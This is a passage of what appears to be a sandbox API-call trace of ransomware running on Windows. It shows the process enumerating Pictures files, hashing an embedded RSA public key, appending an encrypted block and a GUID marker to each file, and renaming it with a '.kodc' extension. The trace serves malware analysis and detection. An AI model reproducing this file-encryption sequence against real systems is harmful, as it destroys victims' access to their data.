0x3317170 [0099.688] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe050) returned 0x9ba6d90 [0099.688] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bd58 [0099.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bda0 [0099.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x6868a0 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655c00 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7980 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.689] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655c00 | out: hHeap=0x630000) returned 1 [0099.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7980 | out: hHeap=0x630000) returned 1 [0099.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x655c00 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7980 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655c00 | out: hHeap=0x630000) returned 1 [0099.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7980 | out: hHeap=0x630000) returned 1 [0099.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.690] GetCurrentThreadId () returned 0x42c [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5a08 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.690] GetCurrentThreadId () returned 0x42c [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.690] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.690] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655c00 [0099.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7980 [0099.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.692] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe053, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.692] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.693] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.693] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.693] CloseHandle (hObject=0x5cc) returned 1 [0099.695] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oI-TD-U-0TkXRG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oi-td-u-0tkxrg.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oI-TD-U-0TkXRG.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oi-td-u-0tkxrg.bmp.kodc")) returned 1 [0099.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.696] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.697] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7577ecb0, ftCreationTime.dwHighDateTime=0x1d5ba3e, ftLastAccessTime.dwLowDateTime=0x7d44d710, ftLastAccessTime.dwHighDateTime=0x1d5beb1, ftLastWriteTime.dwLowDateTime=0x7d44d710, ftLastWriteTime.dwHighDateTime=0x1d5beb1, nFileSizeHigh=0x0, nFileSizeLow=0xc82f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oTut6glq e.png", cAlternateFileName="OTUT6G~1.PNG")) returned 1 [0099.697] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oTut6glq e.png") returned=".png" [0099.697] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oTut6glq e.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\otut6glq e.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.698] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=51247) returned 1 [0099.698] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.701] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc809, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.701] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.702] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.702] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xc82f, lpOverlapped=0x0) returned 1 [0099.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.702] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.702] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.703] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.703] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.703] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.703] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.703] GetLastError () returned 0x0 [0099.703] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.703] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.703] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.703] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.704] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc830) returned 0x9ba6d90 [0099.704] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bda0 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x6868a0 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bde8 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655c00 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7980 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7998 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.704] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.705] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc82f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.705] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.705] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.705] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.705] CloseHandle (hObject=0x5cc) returned 1 [0099.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.712] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oTut6glq e.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\otut6glq e.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oTut6glq e.png.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\otut6glq e.png.kodc")) returned 1 [0099.714] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f30b290, ftCreationTime.dwHighDateTime=0x1d5beb9, ftLastAccessTime.dwLowDateTime=0x76835110, ftLastAccessTime.dwHighDateTime=0x1d5bd92, ftLastWriteTime.dwLowDateTime=0x76835110, ftLastWriteTime.dwHighDateTime=0x1d5bd92, nFileSizeHigh=0x0, nFileSizeLow=0x1364a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qxpM.bmp", cAlternateFileName="")) returned 1 [0099.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.714] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qxpM.bmp") returned=".bmp" [0099.714] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qxpM.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qxpm.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.714] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=79434) returned 1 [0099.714] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.717] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13624, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.717] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.718] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x1364a, lpOverlapped=0x0) returned 1 [0099.719] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.719] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.719] lstrlenA (lpString="-----BEGIN PUBLIC 